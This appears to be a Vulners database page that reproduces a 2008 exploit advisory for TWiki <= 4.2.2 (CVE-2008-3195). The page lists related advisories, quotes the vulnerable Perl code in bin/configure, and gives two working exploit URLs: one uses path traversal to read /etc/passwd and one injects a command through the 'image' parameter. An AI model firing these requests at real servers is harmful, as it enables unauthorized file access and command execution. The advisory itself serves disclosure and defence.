| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability | 21 Sep 200800:00 | – | zdt | |
| twiki -- Arbitrary code execution in session files | 5 Aug 200800:00 | – | freebsd | |
| CVE-2008-3195 | 19 Aug 200800:00 | – | circl | |
| CVE-2008-3195 | 17 Sep 200818:06 | – | cve | |
| CVE-2008-3195 | 17 Sep 200818:06 | – | cvelist | |
| [SECURITY] [DSA 1639-1] New twiki packages execution of arbitrary code | 19 Sep 200819:25 | – | debian | |
| Debian DSA-1639-1 : twiki - command execution | 22 Sep 200800:00 | – | nessus | |
| FreeBSD : bmon -- unsafe set-user-ID application (18) | 18 Oct 200400:00 | – | nessus | |
| FreeBSD : twiki -- Arbitrary code execution in session files (9227dcaf-827f-11dd-9cd7-0050568452ac) | 15 Sep 200800:00 | – | nessus | |
| TWiki bin/configure 'image' Parameter Traversal Arbitrary File Access/Execution | 23 Aug 200800:00 | – | nessus |
#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------TWiki Remote Code Execution <= 4.2.2--------------------#
# ----------developers site: http://www.twiki.org-------------------#
# ----------CVE Id(s) : CVE-2008-3195--------------------------#
# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights
The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion.
According to TWiki's documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;)
Vulnerable code:
if( $action eq 'image' ) {
# SMELL: this call is correct, but causes a perl error
# on some versions of CGI.pm
# print $query->header(-type => $query->param('type'));
# So use this instead:
print 'Content-type: '.$query->param('type')."\n\n";
if( open(F, 'logos/'.$query->param('image' ))) {
local $/ = undef;
print <F>;
close(F);
}
http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain
http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain
# milw0rm.com [2008-09-21]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation